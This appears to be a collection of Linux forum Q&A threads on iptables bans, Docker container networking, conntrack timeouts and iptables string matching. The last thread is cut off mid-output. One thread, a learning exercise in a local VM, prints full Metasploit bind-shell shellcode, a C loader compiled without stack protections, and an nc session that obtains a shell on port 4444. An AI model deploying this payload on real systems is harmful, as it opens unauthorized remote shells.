iptables block IP for x hours not working? - linux

On my Linux server, I want to ban IPs that access certain ports for 24 hours using IPtables. For this, I use the following IPtables rules:
# Check if IP is on banlist, if yes then drop
-A INPUT -m state --state NEW -j bancheck
-A bancheck -m recent --name blacklist --rcheck --reap --seconds 86400 -j LOG --log-prefix "IPT blacklist_ban: "
-A bancheck -m recent --name blacklist --rcheck --reap --seconds 86400 -j DROP
# PUT IPs on banlist
-A banlist -m recent --set --name blacklist -j LOG --log-prefix "IPT add_IP_to_blacklist: "
-A banlist -j DROP
# Ban access to these ports
-A INPUT -p tcp -m multiport --dports 23,25,445,1433,2323,3389,4899,5900 -j LOG --log-prefix "IPT syn_naughty_ports: "
-A INPUT -p tcp -m multiport --dports 23,25,445,1433,2323,3389,4899,5900 -j banlist
In the logs, I can verify that this works:
Mar 13 02:12:23 kernel: [39534099.648488] IPT syn_naughty_ports: IN=eth0 OUT= MAC=... SRC=218.189.140.2 DST=... LEN=52 TOS=0x00 PREC=0x00 TTL=113 ID=29768 DF PROTO=TCP SPT=65315 DPT=25 WINDOW=8192 RES=0x00 SYN URGP=0
Mar 13 02:12:23 kernel: [39534099.648519] IPT add_IP_to_blacklist: IN=eth0 OUT= MAC=... SRC=218.189.140.2 DST=...4 LEN=52 TOS=0x00 PREC=0x00 TTL=113 ID=29768 DF PROTO=TCP SPT=65315 DPT=25 WINDOW=8192 RES=0x00 SYN URGP=0
Mar 13 02:12:26 kernel: [39534102.664136] IPT blacklist_ban: IN=eth0 OUT= MAC=... SRC=218.189.140.2 DST=... LEN=52 TOS=0x00 PREC=0x00 TTL=113 ID=4724 DF PROTO=TCP SPT=65315 DPT=25 WINDOW=8192 RES=0x00 SYN URGP=0
But then the logs also show that just over 2 hours later, the same IP again accesses my system. Rather than being blocked right at the beginning through the chain "bancheck", the IP can access the port, which results in it being put on the "banlist" again (destination port in both cases was the same port 25).
Mar 13 04:35:59 kernel: [39542718.875859] IPT syn_naughty_ports: IN=eth0 OUT= MAC=... SRC=218.189.140.2 DST=... LEN=52 TOS=0x00 PREC=0x00 TTL=113 ID=4533 DF PROTO=TCP SPT=57719 DPT=25 WINDOW=8192 RES=0x00 SYN URGP=0
Mar 13 04:35:59 kernel: [39542718.875890] IPT add_IP_to_blacklist: IN=eth0 OUT= MAC=... SRC=218.189.140.2 DST=... LEN=52 TOS=0x00 PREC=0x00 TTL=113 ID=4533 DF PROTO=TCP SPT=57719 DPT=25 WINDOW=8192 RES=0x00 SYN URGP=0
Mar 13 04:36:02 kernel: [39542721.880524] IPT blacklist_ban: IN=eth0 OUT= MAC=... DST=... LEN=52 TOS=0x00 PREC=0x00 TTL=113 ID=12505 DF PROTO=TCP SPT=57719 DPT=25 WINDOW=8192 RES=0x00 SYN URGP=0
Mar 13 04:36:08 kernel: [39542727.882973] IPT blacklist_ban: IN=eth0 OUT= MAC=... SRC=218.189.140.2 DST=... LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=29092 DF PROTO=TCP SPT=57719 DPT=25 WINDOW=8192 RES=0x00 SYN URGP=0
But if I understand the IPtables rules right, it should be blocked within the first few lines, as long as it is within the 24 hours, and not be able to get down that far in the IPtables rule set where it is again being found to violate the ports rule, and again put on the "banlist".
Am I doing something wrong, or do I misunderstand the way the rules work?

Working example for ssh from my server
iptables -X black
iptables -N black
iptables -A black -m recent --set --name blacklist -j DROP
iptables -X ssh
iptables -N ssh
iptables -I ssh 1 -m recent --update --name blacklist --reap --seconds 86400 -j DROP
iptables -A INPUT -p TCP --dport ssh -m state --state NEW -j ssh
Don't forget to create the iptables chains with iptables -N
Compare this with your config and see if there are any notable differences.
A more elegant solution would be to use ipset combined with iptables:
timeout
All set types supports the optional timeout parameter when creating a set and adding entries. The value of the timeout parameter for the create command means the default timeout value (in seconds) for new entries. If a set is created with timeout support, then the same timeout option can be used to specify non-default timeout values when adding entries. Zero timeout value means the entry is added permanent to the set. The timeout value of already added elements can be changed by readding the element using the -exist option.
Example:
ipset create test hash:ip timeout 300
ipset add test 192.168.0.1 timeout 60
ipset -exist add test 192.168.0.1 timeout 600

Related

Docker container cannot connect to the Internet, ping works, wget fails

I am trying to find a solution for days now and ended up asking questions here...
I have Debian 10 with Docker installed, a container connects to the other containers without any problem, but I cannot figure out what needs to be done to access the Internet from the containers.
A container can do a ping and gets the replies:
docker run -i -t busybox ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8): 56 data bytes
64 bytes from 8.8.8.8: seq=0 ttl=53 time=10.156 ms
64 bytes from 8.8.8.8: seq=1 ttl=53 time=10.516 ms
64 bytes from 8.8.8.8: seq=2 ttl=53 time=10.218 ms
64 bytes from 8.8.8.8: seq=3 ttl=53 time=10.487 ms
Unfortunately, when I try to use wget it fails:
docker run -i -t busybox wget -S -T 5 http://google.com
Connecting to google.com (216.58.209.14:80)
wget: download timed out
The containers DNS seem to be properly set up:
docker run -i -t busybox cat /etc/resolv.conf
nameserver 8.8.8.8
nameserver 8.8.4.4
OS details and docker version:
uname -a
Linux host1 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
docker -v
Docker version 19.03.8, build afacb8b7f0
Docker bridge network details:
docker network inspect bridge
[
{
"Name": "bridge",
"Id": "970f8f04c009361b831d8ff8b4fa6d223645aadbbe93a27576d4934c0a8710e0",
"Created": "2020-04-23T17:15:37.376767708+02:00",
"Scope": "local",
"Driver": "bridge",
"EnableIPv6": false,
"IPAM": {
"Driver": "default",
"Options": null,
"Config": [
{
"Subnet": "172.17.0.0/16",
"Gateway": "172.17.0.1"
}
]
},
"Internal": false,
"Attachable": false,
"Ingress": false,
"ConfigFrom": {
"Network": ""
},
"ConfigOnly": false,
"Containers": {},
"Options": {
"com.docker.network.bridge.default_bridge": "true",
"com.docker.network.bridge.enable_icc": "true",
"com.docker.network.bridge.enable_ip_masquerade": "true",
"com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
"com.docker.network.bridge.name": "docker0",
"com.docker.network.driver.mtu": "1500"
},
"Labels": {}
}
]
iptables are enabled and configured, however I have also tried with clear rules (ACCEPT all), still no luck:
iptables -nvL
Chain INPUT (policy DROP 484 packets, 40785 bytes)
pkts bytes target prot opt in out source destination
2 116 ACCEPT tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:443 state NEW
2501 309K ACCEPT all -- * * 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
3 192 ACCEPT tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:1337
0 0 ACCEPT all -- lo * 0.0.0.0/0 0.0.0.0/0
8 498 ACCEPT udp -- * * 0.0.0.0/0 0.0.0.0/0 udp dpt:1194 state NEW
10 640 ACCEPT all -- tun0 * 0.0.0.0/0 0.0.0.0/0
Chain FORWARD (policy DROP 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
70 4889 DOCKER-USER all -- * * 0.0.0.0/0 0.0.0.0/0
46 3449 DOCKER-ISOLATION-STAGE-1 all -- * * 0.0.0.0/0 0.0.0.0/0
14 1164 ACCEPT all -- * docker0 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
0 0 DOCKER all -- * docker0 0.0.0.0/0 0.0.0.0/0
24 1607 ACCEPT all -- docker0 !docker0 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- docker0 docker0 0.0.0.0/0 0.0.0.0/0
8 678 ACCEPT all -- tun0 * 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- tun0 ens192 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED
0 0 ACCEPT all -- ens192 tun+ 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED
Chain OUTPUT (policy ACCEPT 10 packets, 733 bytes)
pkts bytes target prot opt in out source destination
1782 1233K ACCEPT all -- * * 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED
0 0 ACCEPT all -- * lo 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- * tun0 0.0.0.0/0 0.0.0.0/0
Chain DOCKER (1 references)
pkts bytes target prot opt in out source destination
Chain DOCKER-ISOLATION-STAGE-1 (1 references)
pkts bytes target prot opt in out source destination
24 1607 DOCKER-ISOLATION-STAGE-2 all -- docker0 !docker0 0.0.0.0/0 0.0.0.0/0
46 3449 RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
Chain DOCKER-USER (1 references)
pkts bytes target prot opt in out source destination
24 1440 REJECT tcp -- ens192 * 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable
46 3449 RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
Chain DOCKER-ISOLATION-STAGE-2 (1 references)
pkts bytes target prot opt in out source destination
0 0 DROP all -- * docker0 0.0.0.0/0 0.0.0.0/0
24 1607 RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
iptables -t nat -nvL
Chain PREROUTING (policy ACCEPT 516 packets, 43250 bytes)
pkts bytes target prot opt in out source destination
290 14045 DOCKER all -- * * 0.0.0.0/0 0.0.0.0/0 ADDRTYPE match dst-type LOCAL
Chain INPUT (policy ACCEPT 18 packets, 1101 bytes)
pkts bytes target prot opt in out source destination
Chain POSTROUTING (policy ACCEPT 10 packets, 744 bytes)
pkts bytes target prot opt in out source destination
10 590 MASQUERADE all -- * !docker0 172.17.0.0/16 0.0.0.0/0
0 0 MASQUERADE tcp -- * * 172.17.0.2 172.17.0.2 tcp dpt:80
Chain OUTPUT (policy ACCEPT 9 packets, 666 bytes)
pkts bytes target prot opt in out source destination
0 0 DOCKER all -- * * 0.0.0.0/0 !127.0.0.0/8 ADDRTYPE match dst-type LOCAL
Chain DOCKER (2 references)
pkts bytes target prot opt in out source destination
0 0 RETURN all -- docker0 * 0.0.0.0/0 0.0.0.0/0
Any idea why my containers cannot connect to the outside world?
EDIT:
I have tried cleaning up completely my iptables rules and allow all traffic:
iptables -nvL
Chain INPUT (policy ACCEPT 12968 packets, 945K bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 83 packets, 7850 bytes)
pkts bytes target prot opt in out source destination
iptables -t nat -nvL
Chain PREROUTING (policy ACCEPT 12871 packets, 939K bytes)
pkts bytes target prot opt in out source destination
Chain INPUT (policy ACCEPT 37 packets, 1856 bytes)
pkts bytes target prot opt in out source destination
Chain POSTROUTING (policy ACCEPT 29 packets, 2447 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 29 packets, 2447 bytes)
pkts bytes target prot opt in out source destination
iptables -t mangle -nvL
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
In such case even pings are not going out of the container:
docker run -i -t busybox ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8): 56 data bytes
--- 8.8.8.8 ping statistics ---
7 packets transmitted, 0 packets received, 100% packet loss

How to run the linux/x86/shell_bind_tcp payload stand alone?

I'm running a Metasploit payload in a sandbox c program.
Below is a summary of the payload of interest. From there I generate some shellcode and load it up in my sandbox, but when I run it the program will simply wait. I think this is because it's waiting for a connection to send the shell, but I'm not sure.
How would I go from:
Generating shellcode
Loading it into my sandbox
Successfully get a /bin/sh shell <- this is the part I'm stuck on.
Basic setup:
max#ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp S
[sudo] password for max:
Name: Linux Command Shell, Bind TCP Inline
Module: payload/linux/x86/shell_bind_tcp
Platform: Linux
Arch: x86
Needs Admin: No
Total size: 200
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle#metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell
Generating shellcode:
max#ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
Sandbox program with shellcode:
#include<stdio.h>
#include<string.h>
/*
objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
*/
unsigned char code[] = \
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Compile and run. However, this is where I'm not sure how to get a /bin/sh shell:
max#ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max#ubuntu-vm:~/SLAE/mod2$ ./shellcode
Shellcode Length: 20
(program waiting here...waiting for a connection?)
Edit:
In terminal one I run my shellcode program:
max#ubuntu-vm:~/SLAE/mod2$ ./shellcode
Shellcode Length: 20
Now in terminal two, I check for tcp listeners. Giving -n to suppress host name resolution, -t for tcp, -l for listeners, and -p to see the program names.
I can see the shellcode program on port 4444:
max#ubuntu-vm:~$ sudo netstat -ntlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 14885/shellcode
max#ubuntu-vm:~$
Connecting with telnet, and it seems like it was successful but still no sh shell.
max#ubuntu-vm:~$ telnet 0.0.0.0 4444
Trying 0.0.0.0...
Connected to 0.0.0.0.
Escape character is '^]'.
How do I get an sh shell?
Generate shellcode, compile and run:
max#ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
/*
* linux/x86/shell_bind_tcp - 78 bytes
* http://www.metasploit.com
* VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false,
* PrependSetresuid=false, PrependSetreuid=false,
* PrependSetuid=false, PrependSetresgid=false,
* PrependSetregid=false, PrependSetgid=false,
* PrependChrootBreak=false, AppendExit=false,
* InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
max#ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max#ubuntu-vm:~/SLAE/mod2$ ./shellcode
Shellcode Length: 20
Now, in terminal 2. Check for connections and finally connect using netcat. Note, that the $ doesn't appear but the shell is still there:
max#ubuntu-vm:~$ sudo netstat -ntlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 3326/shellcode
max#ubuntu-vm:~$ nc 0.0.0.0 4444
pwd
/home/max/SLAE/mod2
whoami
max
ls -l
total 516
-rwxrwxr-x 1 max max 591 Jan 2 07:06 InsertionEncoder.py
-rwxrwxr-x 1 max max 591 Jan 2 07:03 InsertionEncoder.py~
-rwxrwxr-x 1 max max 471 Dec 30 17:00 NOTEncoder.py
-rwxrwxr-x 1 max max 471 Dec 30 16:57 NOTEncoder.py~
-rwxrwxr-x 1 max max 442 Jan 2 09:58 XOREncoder.py
-rwxrwxr-x 1 max max 442 Dec 30 08:36 XOREncoder.py~
-rwxrwxr-x 1 max max 139 Dec 27 08:18 compile.sh

Need to drop established connections with iptables

For app testing purposes, I need to simulate a situation, when a stateful firewall drops an established TCP connection from client to server by timeout. I installed 3 guest VMs in Virtualbox:
Client, network1 ip: 10.0.2.110
Firewall, network1 ip: 10.0.2.5, network2 ip: 10.0.3.5
Server, network2 ip: 10.0.3.6
Client and Server are Fedora19 with iptables disabled
Firewall is Ubuntu 13.10 with the following settings:
cat /etc/iptables.conf
*filter
:INPUT ACCEPT [201:13136]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [110:14472]
-A FORWARD -j LOG --log-prefix "[netfilter] "
-A FORWARD -p icmp -j ACCEPT
-A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -m conntrack --ctstate INVALID -j DROP
-A FORWARD -p tcp -m tcp --dport 2000 -m state --state NEW -j ACCEPT
-A FORWARD -j DROP
COMMIT
sysctl net.netfilter
...
net.netfilter.nf_conntrack_tcp_timeout_close = 10
net.netfilter.nf_conntrack_tcp_timeout_close_wait = 60
net.netfilter.nf_conntrack_tcp_timeout_established = 30
net.netfilter.nf_conntrack_tcp_timeout_fin_wait = 120
net.netfilter.nf_conntrack_tcp_timeout_last_ack = 30
net.netfilter.nf_conntrack_tcp_timeout_max_retrans = 30
net.netfilter.nf_conntrack_tcp_timeout_syn_recv = 60
net.netfilter.nf_conntrack_tcp_timeout_syn_sent = 120
net.netfilter.nf_conntrack_tcp_timeout_time_wait = 30
net.netfilter.nf_conntrack_tcp_timeout_unacknowledged = 30
...
With this settings, conntrack|iptables should drop established TCP connections after 30 seconds of inactivity.
To run the test, I set up "server" on Server:
# ncat -l 2000 --keep-open --exec "/bin/cat"
and connect there with telnet on Client:
$ telnet 10.0.3.6 2000
Trying 10.0.3.6...
Connected to 10.0.3.6.
Escape character is '^]'.
In iptables log I get a normal TCP handshake:
Dec 2 12:24:23 ubuntu kernel: [ 5231.169804] [netfilter] IN=eth0 OUT=eth1 MAC=08:00:27:b8:68:9f:08:00:27:4f:ee:15:08:00 SRC=10.0.2.110 DST=10.0.3.6 LEN=60 TOS=0x10 PREC=0x00 TTL=63 ID=44926 DF PROTO=TCP SPT=47899 DPT=2000 WINDOW=29200 RES=0x00 SYN URGP=0
Dec 2 12:24:23 ubuntu kernel: [ 5231.170489] [netfilter] IN=eth1 OUT=eth0 MAC=08:00:27:00:72:8c:08:00:27:74:b7:df:08:00 SRC=10.0.3.6 DST=10.0.2.110 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=2000 DPT=47899 WINDOW=28960 RES=0x00 ACK SYN URGP=0
Dec 2 12:24:23 ubuntu kernel: [ 5231.171315] [netfilter] IN=eth0 OUT=eth1 MAC=08:00:27:b8:68:9f:08:00:27:4f:ee:15:08:00 SRC=10.0.2.110 DST=10.0.3.6 LEN=52 TOS=0x10 PREC=0x00 TTL=63 ID=44927 DF PROTO=TCP SPT=47899 DPT=2000 WINDOW=229 RES=0x00 ACK URGP=0
While connection is established, I send several packets with telnet and with # conntrack -L command, I get:
tcp 6 24 ESTABLISHED src=10.0.2.110 dst=10.0.3.6 sport=47899 dport=2000 src=10.0.3.6 dst=10.0.2.110 sport=2000 dport=47899 [ASSURED] mark=0 use=1
And in iptables log I get:
Dec 2 12:24:38 ubuntu kernel: [ 5245.917564] [netfilter] IN=eth0 OUT=eth1 MAC=08:00:27:b8:68:9f:08:00:27:4f:ee:15:08:00 SRC=10.0.2.110 DST=10.0.3.6 LEN=55 TOS=0x10 PREC=0x00 TTL=63 ID=44928 DF PROTO=TCP SPT=47899 DPT=2000 WINDOW=229 RES=0x00 ACK PSH URGP=0
Dec 2 12:24:38 ubuntu kernel: [ 5245.917961] [netfilter] IN=eth1 OUT=eth0 MAC=08:00:27:00:72:8c:08:00:27:74:b7:df:08:00 SRC=10.0.3.6 DST=10.0.2.110 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=36952 DF PROTO=TCP SPT=2000 DPT=47899 WINDOW=227 RES=0x00 ACK URGP=0
Dec 2 12:24:38 ubuntu kernel: [ 5245.918326] [netfilter] IN=eth1 OUT=eth0 MAC=08:00:27:00:72:8c:08:00:27:74:b7:df:08:00 SRC=10.0.3.6 DST=10.0.2.110 LEN=55 TOS=0x00 PREC=0x00 TTL=63 ID=36953 DF PROTO=TCP SPT=2000 DPT=47899 WINDOW=227 RES=0x00 ACK PSH URGP=0
Dec 2 12:24:38 ubuntu kernel: [ 5245.918535] [netfilter] IN=eth0 OUT=eth1 MAC=08:00:27:b8:68:9f:08:00:27:4f:ee:15:08:00 SRC=10.0.2.110 DST=10.0.3.6 LEN=52 TOS=0x10 PREC=0x00 TTL=63 ID=44929 DF PROTO=TCP SPT=47899 DPT=2000 WINDOW=229 RES=0x00 ACK URGP=0
that's also OK.
Next, I wait for several minutes and check that # conntrack -L returns an empty table, than I send some more packets with telnet and expect that it freezes or says something like "connection closed", but, to my surprise, connection isn't actually closed and I get such messages in iptables log:
Dec 2 12:29:51 ubuntu kernel: [ 5558.925402] [netfilter] IN=eth0 OUT=eth1 MAC=08:00:27:b8:68:9f:08:00:27:4f:ee:15:08:00 SRC=10.0.2.110 DST=10.0.3.6 LEN=55 TOS=0x10 PREC=0x00 TTL=63 ID=44930 DF PROTO=TCP SPT=47899 DPT=2000 WINDOW=229 RES=0x00 ACK PSH URGP=0
Dec 2 12:29:51 ubuntu kernel: [ 5558.925927] [netfilter] IN=eth1 OUT=eth0 MAC=08:00:27:00:72:8c:08:00:27:74:b7:df:08:00 SRC=10.0.3.6 DST=10.0.2.110 LEN=55 TOS=0x00 PREC=0x00 TTL=63 ID=36954 DF PROTO=TCP SPT=2000 DPT=47899 WINDOW=227 RES=0x00 ACK PSH URGP=0
Dec 2 12:29:51 ubuntu kernel: [ 5558.926237] [netfilter] IN=eth0 OUT=eth1 MAC=08:00:27:b8:68:9f:08:00:27:4f:ee:15:08:00 SRC=10.0.2.110 DST=10.0.3.6 LEN=52 TOS=0x10 PREC=0x00 TTL=63 ID=44931 DF PROTO=TCP SPT=47899 DPT=2000 WINDOW=229 RES=0x00 ACK URGP=0
No TCP handshake, that could indicate that telnet silently reestablished connection , no difference from previous log, where connection was established according to conntrack.
How can I really make iptables to close established connection after 30 seconds of inactivity?
This might not be the answer, but some explanation of the behaviour: It seems that ip_conntrack tries to allocate the same source port which the internal client has used again on the external interface if it is available. That means, even after a complete wipe of the conntrack table it will be "transparently" re-establish on the same port and TCP sees no interruption. And actually you could consider this as a feature.
To verify this behaviour you would need 2 clients with the same source port connecting to the outside world and then see conntrack again (hard to get simulated as OS assigns source port numbers freely). You should get 2 different port numbers then. Only in this case the TCP connection might recognize that something happened in the meantime (which will be connection closed in most cases)...
try to insert into FORWARD -m state INVALID -j DROP
this will drops packets without established connection.

Linux Iptables string module does not match all packets

This is the first time I'm using matching string module for iptables and met some strange behaviour I can't overcome.
In short, it looks like iptables passes "trimmed" packets to module, so module can not parse whole packet for string.
I cant find any information about such behaviour on net. All examples and tutors should work like a charm, but they dont.
Now in details.
OS: debian testing, kernel 3.2.0-3-686-pae
IPTABLES: iptables v1.4.14
OTHER:
tcpdump version 4.3.0,
libpcap version 1.3.0
# lsmod|grep ipt
ipt_LOG 12533 0
iptable_nat 12800 0
nf_nat 17924 1 iptable_nat
nf_conntrack_ipv4 13726 3 nf_nat,iptable_nat
nf_conntrack 43121 3 nf_conntrack_ipv4,nf_nat,iptable_nat
iptable_filter 12488 0
ip_tables 17079 2 iptable_filter,iptable_nat
x_tables 18121 6
ip_tables,iptable_filter,iptable_nat,xt_string,xt_tcpudp,ipt_LOG
I'v reseted all rules to default and added only two rules in following order:
iptables -t filter -A OUTPUT --protocol tcp --dport 80 --match string --algo bm --from 0 --to 1500 --string "/index.php" --jump LOG --log-prefix "matched :"
iptables -t filter -A OUTPUT --protocol tcp --dport 80 --jump LOG --log-prefix "OUT : "
The idea is obious - match requests to any ip to port 80 containing string /index.php and print them to log, and also log all the data passed to 80 port.
So the iptables -L -xvn :
Chain INPUT (policy ACCEPT 3 packets, 693 bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 3 packets, 184 bytes)
pkts bytes target prot opt in out source destination
0 0 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 STRING match "/index.php" ALGO name bm TO 1500 LOG flags 0 level 4 prefix "matched :"
0 0 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 LOG flags 0 level 4 prefix "OUT : "
Counters for rules are zeroed.
Ok, now browser goes to www.gentoo.org/index.php. This url is just example for illustration.
So this is the only request url in browser.
And I get the following for iptables -t filter -L -xvn:
Chain INPUT (policy ACCEPT 61 packets, 16657 bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 63 packets, 4394 bytes)
pkts bytes target prot opt in out source destination
1 380 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 STRING match "/index.php" ALGO name bm TO 1500 LOG flags 0 level 4 prefix "matched :"
13 1392 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 LOG flags 0 level 4 prefix "OUT : "
So we have only ONE match for 1st rule. But that is wrong. Here is tcpdump for output for connection.
First ip request 89.16.167.134:
<handshake omitted>
16:56:38.440308 IP 192.168.66.106.54704 > 89.16.167.134.80: Flags [P.], seq 1:373, ack 1, win 913,
options [nop,nop,TS val 85359 ecr 3026115253], length 372
<...>
0x0030: b45e dab5 4745 5420 2f69 6e64 6578 2e70 .^..GET./index.p
0x0040: 6870 2048 5454 502f 312e 310d 0a48 6f73 hp.HTTP/1.1..Hos
0x0050: 743a 2077 7777 2e67 656e 746f 6f2e 6f72 t:.www.gentoo.or
0x0060: 670d 0a55 7365 722d 4167 656e 743a 204d g..User-Agent:.M
0x0070: 6f7a 696c 6c61 2f35 2e30 2028 5831 313b ozilla/5.0.(X11;
Here we see one match in HTTP GET. Ok some packets later we have request for some more content to ip 140.211.166.176:
16:56:38.772432 IP 192.168.66.106.59766 > 140.211.166.176.80: Flags [P.], seq 1:329, ack 1, win 913,
options [nop,nop,TS val 85442 ecr 110101513], length 328
<...>
0x0030: 0690 0409 4745 5420 2f20 4854 5450 2f31 ....GET./.HTTP/1
<...>
0x0130: 6566 6c61 7465 0d0a 436f 6e6e 6563 7469 eflate..Connecti
0x0140: 6f6e 3a20 6b65 6570 2d61 6c69 7665 0d0a on:.keep-alive..
0x0150: 5265 6665 7265 723a 2068 7474 703a 2f2f Referer:.http://
0x0160: 7777 772e 6765 6e74 6f6f 2e6f 7267 2f69 www.gentoo.org/i
0x0170: 6e64 6578 2e70 6870 0d0a 0d0a ndex.php....
Here we see "/index.php" again.
But LOG rule gives the following info:
kernel: [ 641.386182] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=89.16.167.134 LEN=60
kernel: [ 641.435946] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=89.16.167.134 LEN=52
kernel: [ 641.436226] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=89.16.167.134 LEN=424
kernel: [ 641.512594] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=89.16.167.134 LEN=52
kernel: [ 641.512762] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=89.16.167.134 LEN=52
kernel: [ 641.512819] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=89.16.167.134 LEN=52
kernel: [ 641.567496] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=60
kernel: [ 641.767707] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=52
kernel: [ 641.768328] matched :IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=380 <--
kernel: [ 641.768352] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=380
kernel: [ 641.990287] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=52
kernel: [ 641.990455] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=52
kernel: [ 641.990507] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=52
kernel: [ 641.990559] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=52
So we have match on only one packet, going to 140.211.166.176. But where is the first match?
The more strange for me is that on ither machine with ubuntu, it gives different counters, like 6 matches for string.
I'v also made same simple test on home notebook with ubuntu 12.04 and i get 2 clear matches.
Mb there is some kind of options to tune module data passing or smth?
UPDATE:
Very simple experiment mb if someone could explain that moment it will give a hint.
Now two pc, server centos 6.3 which listens on port 80 with netcat ans answers string:
# echo "List-IdServer"|nc -l 80
List-Id
And client (debian) connecting to server and sending data with nc and reading answer:
% echo "List-Id"|nc butorabackup 80
List-IdServer
After data exchange i have on SERVER SIDE:
Chain INPUT (policy ACCEPT 33 packets, 2164 bytes)
